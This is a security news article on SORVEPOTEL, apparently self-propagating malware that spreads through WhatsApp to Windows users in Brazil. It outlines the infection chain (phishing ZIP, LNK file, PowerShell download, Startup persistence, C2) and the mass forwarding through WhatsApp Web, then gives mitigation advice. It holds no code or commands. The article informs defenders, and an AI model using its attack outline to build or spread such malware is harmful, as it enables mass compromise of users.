A new self-propagating malware, dubbed SORVEPOTEL, has been identified targeting Brazilian users by leveraging the popular messaging platform WhatsApp. This campaign, uncovered by Trend Micro researchers, utilizes the inherent trust associated with WhatsApp to disseminate itself across Windows systems. Unlike traditional malware that focuses on data theft or ransomware, SORVEPOTEL is engineered primarily for rapid spread and propagation.
Infection Mechanism
The attack initiates with a phishing message sent from an already compromised contact on WhatsApp, enhancing its credibility. This message includes a ZIP attachment disguised as a benign file, such as a receipt or a health-related document. Upon opening the attachment, the user encounters a Windows shortcut (LNK) file. Executing this file triggers a PowerShell script that downloads the main payload from an external server, for instance, sorvetenopoate[.]com.
Once the payload is executed, it establishes persistence on the host system by copying itself to the Windows Startup folder, ensuring it launches automatically upon system startup. Additionally, it runs a PowerShell command that communicates with a command-and-control (C2) server to receive further instructions or additional malicious components.
Propagation via WhatsApp Web
A distinctive feature of SORVEPOTEL is its exploitation of the WhatsApp Web interface for propagation. If the malware detects an active WhatsApp Web session on the infected system, it automatically sends the malicious ZIP file to all contacts and groups associated with the victim’s account. This automated dissemination results in a high volume of spam messages, often leading to account suspensions or bans due to violations of WhatsApp’s terms of service.
Geographical Impact
The majority of SORVEPOTEL infections have been reported in Brazil, with 457 out of 477 cases concentrated in the country. The affected sectors include government, public service, manufacturing, technology, education, and construction.
Distribution Channels
While WhatsApp serves as the primary vector for SORVEPOTEL’s spread, there is evidence suggesting that the operators behind this campaign have also utilized email to distribute the malicious ZIP files. These emails appear to originate from legitimate addresses, further enhancing their deceptive nature.
Mitigation Strategies
To protect against SORVEPOTEL and similar threats, users are advised to:
– Exercise Caution with Attachments: Avoid opening attachments from unknown or untrusted sources, even if they appear to come from known contacts.
– Verify Unexpected Messages: If you receive an unexpected message with an attachment, especially from a known contact, verify its authenticity through a different communication channel before opening it.
– Keep Software Updated: Regularly update your operating system and applications to patch known vulnerabilities.
– Use Security Software: Employ reputable antivirus and anti-malware solutions to detect and prevent infections.
– Monitor Account Activity: Regularly review your account activity for any unauthorized actions and report suspicious behavior to the platform’s support team.
Conclusion
The SORVEPOTEL campaign underscores the evolving tactics of cybercriminals who exploit trusted communication platforms like WhatsApp to achieve rapid, large-scale malware propagation with minimal user interaction. By staying vigilant and adopting proactive security measures, users can mitigate the risks associated with such self-spreading malware.
